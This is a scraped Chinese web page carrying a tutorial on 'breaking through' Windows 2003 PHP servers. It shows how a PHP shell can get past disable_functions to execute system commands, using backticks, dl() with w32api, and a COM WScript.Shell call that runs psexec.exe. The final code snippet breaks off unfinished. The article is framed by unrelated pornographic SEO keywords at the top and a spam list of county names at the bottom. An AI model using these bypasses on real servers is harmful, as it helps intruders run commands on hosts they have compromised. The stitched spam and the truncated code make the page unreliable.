国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > OS > Win2003 > 正文

win2003 PHP服務(wù)器的突破新思路

2024-09-10 16:49:14
字體:
供稿:網(wǎng)友
從WIN2000到WIN XP, 再到WIN2003, MS IIS服務(wù)器安全性的提高是顯而易見的。 在WIN2000中, 一個普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也無法用system() 等函數(shù)執(zhí)行系統(tǒng)命令, 但是我們還能用com()函數(shù)進行突破;到WIN 2003,即使IIS 和PHP都是默認安裝,你用system(), com()也可能拿它沒轍。這時候你就不得不使用一些新的方法來進行突破了。
  1、disable_functions的突破
  在php -4.0.1以上的版本,php.ini里引入了一項功能disable_functions , 這個功能比較有用,可以用它禁止一些函數(shù)。比如在php.ini里加上disable_functions = passthru exec system popen 那么在執(zhí)行這些函數(shù)的時候?qū)崾網(wǎng)arning: system() has been disabled for security reasons,同時程序終止運行。但是也不是沒有辦法執(zhí)行系統(tǒng)命令了。因為php采用了很多perl的特性,比如還可以用(`)來執(zhí)行命令,示例代碼如下:
  <?$output = `ls -al`;echo "<pre>$output</pre>";?>
  據(jù)說這個只有設(shè)成safe_mode為on才能避免,但上次我在一臺國外的服務(wù)器上使用的時候還是失敗了,人并不是什么時候都能那么走運的:)
  2、dl()函數(shù)的應(yīng)用
  當(dāng)任何PHP的內(nèi)部命令執(zhí)行數(shù)和''都無法使用的時候,可以嘗試dl(),該方法只能用于safe mode=off, 因為它在安全模式下是被禁用的。利用dl()你可以直接調(diào)用W32api 函數(shù),可惜這個擴展已被移動到 PECL 庫中,且自PHP 5.1.0以下版本起不再被綁定。以下是手冊里的例子:
  // 加載此擴展
  dl("php_w32api.dll");
  // 注冊 GetTickCount 函數(shù),來自 kernel32.dll
  w32api_register_function("kernel32.dll",
  "GetTickCount",
  "long");
  // 注冊 MessageBoxA 函數(shù),來自 User32.dll
  w32api_register_function("User32.dll",
  "MessageBoxA",
  "long");
  // 取得開機時間信息
  $ticks = GetTickCount();
  // 轉(zhuǎn)換為易于理解的文本
  $secs = floor($ticks / 1000);
  $mins = floor($secs / 60);
  $hours = floor($mins / 60);
  $str = sprintf("You have been using your computer for:".
  "/r/n %d Milliseconds, or /r/n %d Seconds".
  "or /r/n %d mins or/r/n %d hours %d mins.",
  $ticks,
  $secs,
  $mins,
  $hours,
  $mins - ($hours*60));
  // 顯示一個消息對話框,只有一個 OK 按鈕和上面的開機時間文本
  MessageBoxA(NULL,
  $str,
  "Uptime Information",
  MB_OK);
  ?>
  可惜我還沒有理解透徹dl()和W32api, 所以就不亂舉例子了, 免得誤導(dǎo)讀者。
  3、COM 和 .Net(Windows)函數(shù)的應(yīng)用
  COM(Component Object Model,組件對象模型)是微軟開發(fā)的軟件規(guī)范,它用于開發(fā)面向?qū)ο蟮摹⒕幾g好的軟件組件,它允許把軟件抽象成為二進制的部件,主要運用于windows平臺。
  PHP 的 Windows 版本已經(jīng)內(nèi)置該擴展模塊的支持。無需加載任何附加擴展庫即可使用COM函數(shù)。它的使用方法類似于C++或Java中類的創(chuàng)建的語法,并把COM的類名作為參數(shù)傳遞到構(gòu)造函數(shù)。例如使用在PHP中調(diào)用“WScript.Shell”執(zhí)行系統(tǒng)命令:
  $cmd=” E:/cert/admin/psexec.exe”;
  if($com=new COM("WScript.Shell")) echo "yes";
  if(!$cmd1=$com->exec($cmd))
  {
  echo "can not exec()";
  }
  if(!$cmd2=$cmd1->stdout())
  {
  echo "can not stdout()";
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 双辽市| 石门县| 瑞金市| 通化县| 遂平县| 稻城县| 乌兰浩特市| 宁阳县| 青岛市| 西盟| 辰溪县| 斗六市| 郸城县| 武山县| 波密县| 彰化县| 石台县| 武汉市| 伊川县| 凌源市| 渑池县| 鲁山县| 香河县| 图木舒克市| 西吉县| 泉州市| 康马县| 靖宇县| 鄱阳县| 谢通门县| 高邮市| 慈利县| 平邑县| 大冶市| 镇赉县| 大化| 海伦市| 达州市| 图们市| 祁阳县| 晋中市|